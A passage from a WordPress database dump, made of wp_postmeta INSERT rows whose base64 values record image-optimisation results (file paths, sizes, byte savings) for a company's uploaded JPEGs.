jUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY3MSwidGltZSI6MTQ4MzU2Mzg5MSwiaWQiOjE3NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzg1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1NjAsInRpbWUiOjE0ODM1NjM4OTUsImlkIjoxNzc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4NS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4NS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc4NS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjMxLCJ0aW1lIjoxNDgzNTYzODk4LCJpZCI6MTc3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjIwNjgsInRpbWUiOjE0ODM1NjM5MDEsImlkIjoxNzc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzg1LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MjIsInRpbWUiOjE0ODM1NjM5MDUsImlkIjoxNzc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzg1LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1MzQsInRpbWUiOjE0ODM1NjM5MDgsImlkIjoxNzc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzg1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NzksInRpbWUiOjE0ODM1NjM5MTEsImlkIjoxNzc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzg1LTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzg1LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDE2LCJ0aW1lIjoxNDgzNTYzOTE1LCJpZCI6MTc3Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4NS05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODUtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc4NS05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4NSwidGltZSI6MTQ4MzU2MzkxOCwiaWQiOjE3NzZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29204, 1775, 'wpfc_optimisation_reduction', '26292'); 
INSERT INTO `wp_postmeta` VALUES (29205, 1775, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjM5MjMsImlkIjoiMTc3NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzgwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4OTcsInRpbWUiOjE0ODM1NjM5MjYsImlkIjoxNzc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc4MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjk3MywidGltZSI6MTQ4MzU2MzkzMCwiaWQiOjE3NzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzgwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNzAxLCJ0aW1lIjoxNDgzNTYzOTMzLCJpZCI6MTc3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTMxODgsInRpbWUiOjE0ODM1NjM5MzcsImlkIjoxNzc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc4MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjA0LCJ0aW1lIjoxNDgzNTYzOTQwLCJpZCI6MTc3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxMywidGltZSI6MTQ4MzU2Mzk0NCwiaWQiOjE3NzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzgwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1ODksInRpbWUiOjE0ODM1NjM5NDcsImlkIjoxNzc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc4MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc4MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg3MiwidGltZSI6MTQ4MzU2Mzk1MSwiaWQiOjE3NzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxNCwidGltZSI6MTQ4MzU2Mzk1NCwiaWQiOjE3NzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU1MiwidGltZSI6MTQ4MzU2Mzk1NywiaWQiOjE3NzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY0MCwidGltZSI6MTQ4MzU2Mzk2NCwiaWQiOjE3NzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk2MiwidGltZSI6MTQ4MzU2Mzk2NywiaWQiOjE3NzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03ODAtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzgwLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03ODAtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozODcsInRpbWUiOjE0ODM1NjM5NzEsImlkIjoxNzc1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29206, 1774, 'wpfc_optimisation_reduction', '25657'); 
INSERT INTO `wp_postmeta` VALUES (29207, 1774, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjM5NzUsImlkIjoiMTc3NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzcwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4NzksInRpbWUiOjE0ODM1NjM5NzgsImlkIjoxNzc0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc3MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc3MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc3MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjg3MiwidGltZSI6MTQ4MzU2Mzk4MiwiaWQiOjE3NzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzcwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNjI2LCJ0aW1lIjoxNDgzNTYzOTg1LCJpZCI6MTc3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NzAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTI4NjIsInRpbWUiOjE0ODM1NjM5ODksImlkIjoxNzc0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc3MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc3MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc3MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTkxLCJ0aW1lIjoxNDgzNTYzOTkzLCJpZCI6MTc3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGU